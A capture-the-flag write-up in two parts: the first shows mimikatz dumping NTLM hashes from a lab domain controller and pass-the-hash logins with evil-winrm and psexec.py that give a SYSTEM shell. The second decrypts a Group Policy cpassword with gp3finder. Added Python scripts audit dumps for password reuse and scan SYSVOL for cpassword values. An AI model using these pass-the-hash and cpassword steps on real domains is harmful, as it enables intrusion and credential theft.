RID : 000001f4 (500)
User : Administrator
LM :
NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 016e928748d559770ee5fe3028baf718

RID : 0000044f (1103)
User : dsmith
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000450 (1104)
User : crhodes
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000451 (1105)
User : ssmith
LM :
NTLM : 23991f3cd665b0bc1f7cccfd62506161

RID : 00000452 (1106)
User : roastsvc
LM :
NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824

RID : 000003e8 (1000)
User : ROAST$
LM :
NTLM : 0db85ab8c8395c6c1333a4e9e90ae400

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\users\roastsvc\Documents>
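The lsadump output above also shows that dsmith and crhodes have the identical NT hash (both use WelcomeToR04st), which is exactly the password-reuse condition an internal audit should catch. The script below is an added example, not part of the write-up and not mimikatz's own tooling: it parses the `RID / User / LM / NTLM` blocks from `lsadump::lsa /patch` output captured during an authorised assessment, groups accounts by NT hash to surface reuse, and lists accounts with an empty hash. The sample is a constructed excerpt of the output shown above.

```python
import re
from collections import defaultdict

# Constructed excerpt of the lsadump::lsa /patch output shown in the write-up.
SAMPLE_DUMP = """\
RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 0000044f (1103)
User : dsmith
LM   :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID  : 00000450 (1104)
User : crhodes
LM   :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID  : 00000452 (1106)
User : roastsvc
LM   :
NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824
"""

RID_RE = re.compile(r"RID\s*:\s*[0-9a-f]+\s*\((\d+)\)")
USER_RE = re.compile(r"User\s*:\s*(\S+)")
# The NTLM value is optional: "NTLM :" with nothing after it means an empty hash.
NTLM_RE = re.compile(r"NTLM\s*:\s*([0-9a-f]{32})?$")


def parse_lsadump(text):
    """Return a list of (user, rid, ntlm_hex) tuples; ntlm_hex is '' when empty."""
    accounts = []
    user = rid = None
    for raw in text.splitlines():
        line = raw.strip()
        m = RID_RE.match(line)
        if m:
            rid = int(m.group(1))
            continue
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        m = NTLM_RE.match(line)          # "LM :" lines do not match this pattern
        if m and user is not None:
            accounts.append((user, rid, m.group(1) or ""))
            user = rid = None
    return accounts


def shared_hashes(accounts):
    """Map each NT hash used by more than one account to the list of those accounts."""
    groups = defaultdict(list)
    for user, _rid, ntlm in accounts:
        if ntlm:
            groups[ntlm].append(user)
    return {h: users for h, users in groups.items() if len(users) > 1}


def empty_hashes(accounts):
    """Accounts whose NT hash is blank (for example disabled built-ins such as Guest)."""
    return [user for user, _rid, ntlm in accounts if not ntlm]


if __name__ == "__main__":
    accts = parse_lsadump(SAMPLE_DUMP)
    for h, users in shared_hashes(accts).items():
        print(f"[!] password reuse: {', '.join(users)} share NT hash {h[:8]}...")
    for user in empty_hashes(accts):
        print(f"[i] empty NT hash: {user}")
```

Only the hash values are compared, so the check works without cracking anything; the same grouping applied to an NTDS export from your own domain shows which accounts share a password.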
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>


kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Roast

C:\Windows\system32>


kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
Roast
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db


*Evil-WinRM* PS C:\Users> Get-ChildItem -Path C:\Users -Filter *.txt.txt -Recurse -ErrorAction SilentlyContinue -Force
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt
0042894e0a6b2bc2c4517c5f7ccc5c16



https://m.twitch.tv/videos/708116376

Author : Puckiestyle


rz-challenge51-nl

Spoiler Alert

challenge at https://ringzer0ctf.com/challenges/51

I Lost my password can you find it?

First, download the file and unzip it.
To solve this challenge you need to decrypt a value called "cpassword". That is easy because, as the advisory puts it, "Microsoft published the AES encryption key used to protect cpassword attributes in Group Policy preference items (CVE-2014-1812 / MS14-025)."
If you use Windows, you can download this program that does not require installation: https://bitbucket.org/grimhacker/gpppfinder/downloads/

Once downloaded you have to find the following file inside the unzipped challenge file: Policies\{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}\User\Preferences\Groups\Groups.xml
Once opened, you will see: cpassword=PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw
This base64 string is missing its padding: append "=" at the end to make it valid.

Once done, execute the program with that base64 password and you will get the following:

gp3finder_v5.0.exe -D PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw=

Group Policy Preference Password Finder (GP3Finder) 5.0.0
Copyright (C) 2020 Oliver Morton
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

INFO: gp3finder: Decrypted password is 10 characters.
INFO: gp3finder: ———-
INFO: gp3finder: LocalRoot!
INFO: gp3finder: ———-
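The two steps above, locating the `cpassword` attribute in a Group Policy Preferences XML file and restoring its missing base64 padding, are also what a SYSVOL audit needs to do to find such leftovers before anyone else does. The following is an added example, not part of the challenge write-up and not gp3finder's code: it walks a directory for Preferences XML files, reports every element carrying a `cpassword`, pads the value as the text describes, and checks that the result is valid base64 of whole AES blocks. The sample Groups.xml is a constructed minimal file using the cpassword value from the challenge; it deliberately does not decrypt (the page uses gp3finder for that).

```python
import base64
import os
import xml.etree.ElementTree as ET

# Constructed minimal Groups.xml modelled on a GPP "Local Users and Groups" item.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="LocalAdmin" changed="2014-01-01 00:00:00">
    <Properties action="U" userName="LocalAdmin"
                cpassword="PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw"/>
  </User>
</Groups>
"""


def fix_base64_padding(value):
    """GPP stores cpassword without '=' padding; restore it to a multiple of 4 chars."""
    return value + "=" * (-len(value) % 4)


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element that carries a cpassword attribute."""
    hits = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cp = elem.get("cpassword")
        if cp is None:
            continue
        padded = fix_base64_padding(cp)
        raw = base64.b64decode(padded)
        hits.append({
            "source": source,
            "element": elem.tag,
            "userName": elem.get("userName"),
            "cpassword": cp,
            "padded": padded,
            "ciphertext_len": len(raw),
            # AES-CBC output is whole 16-byte blocks; anything else is corrupt.
            "well_formed": len(raw) > 0 and len(raw) % 16 == 0,
        })
    return hits


def scan_sysvol(path):
    """Walk a SYSVOL copy (or unzipped challenge dir) and collect cpassword findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(path):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), source=full))
            except ET.ParseError:
                continue      # not every .xml under Policies is well formed; skip it
    return findings


if __name__ == "__main__":
    import sys
    hits = scan_sysvol(sys.argv[1]) if len(sys.argv) > 1 else find_cpasswords(SAMPLE_GROUPS_XML)
    for h in hits:
        print(f"[!] {h['source']}: <{h['element']} userName={h['userName']}> "
              f"cpassword={h['padded']} ({h['ciphertext_len']} bytes, "
              f"{'ok' if h['well_formed'] else 'malformed'})")
```

On the sample the padded value decodes to 32 bytes, two AES blocks, which is consistent with the 10-character result gp3finder reports above (10 UTF-16LE characters are 20 bytes, padded to 32). Run it with a path argument to sweep an exported SYSVOL tree.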

Author : Puckiestyle